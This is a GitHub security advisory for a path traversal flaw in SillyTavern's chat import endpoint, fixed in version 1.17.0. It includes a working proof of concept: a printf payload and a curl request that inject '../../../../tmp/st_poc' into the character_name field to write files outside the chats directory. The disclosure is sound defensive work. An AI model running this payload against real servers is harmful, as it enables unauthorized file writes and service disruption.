GHSA-xvww-xhx6-22pf

Suggest an improvement
Source
https://github.com/advisories/GHSA-xvww-xhx6-22pf
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-xvww-xhx6-22pf/GHSA-xvww-xhx6-22pf.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-xvww-xhx6-22pf
Aliases
Published
2026-04-01T21:36:40Z
Modified
2026-04-06T17:38:24Z
Severity
  • 8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVSS Calculator
Summary
SillyTavern has a path traversal in `/api/chats/import` allows arbitrary file write outside intended chat directory
Details

Summary

A path traversal vulnerability in /api/chats/import allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into character_name.

Details

character_name is used unsafely as part of the destination filename and then passed into path.join(...) without sanitization.

Evidence:

Example payload:

  • character_name=../../../../tmp/st_poc

This causes the final destination path to escape from <user>/chats/<avatar>/... and write to an attacker-controlled location such as /tmp/... (or any writable path for the service account).

PoC

Prerequisites:

  • Valid authenticated session cookie (cookie.txt)
  • Valid CSRF token ($TOKEN)

Prepare payload:

printf '{"user_name":"u","chat_metadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonl

Trigger arbitrary write:

curl -b cookie.txt -H "x-csrf-token: $TOKEN" \
  -F "avatar=@/tmp/poc.jsonl" \
  -F "file_type=jsonl" \
  -F "avatar_url=a.png" \
  -F "character_name=../../../../tmp/st_poc" \
  -F "user_name=u" \
  http://TARGET:8000/api/chats/import

Observed result:

  • A file is created outside chats directory, for example:
    /tmp/st_poc - <timestamp> imported.jsonl

Impact

  • Integrity: attacker can create files in unintended filesystem locations.
  • Availability: can be used for disk abuse and disruptive file placement.
  • Can become more severe when chained with other local processing behaviors.

Resolution

The issue was addressed in version 1.17.0

Database specific
{
    "cwe_ids":  [
        "CWE-22",
        "CWE-73"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-04-01T21:36:40Z",
    "nvd_published_at":  "2026-04-02T18:16:29Z",
    "severity":  "HIGH"
}
References

Affected packages

npm / sillytavern

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
1.17.0

Database specific

last_known_affected_version_range
"<= 1.16.0"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-xvww-xhx6-22pf/GHSA-xvww-xhx6-22pf.json"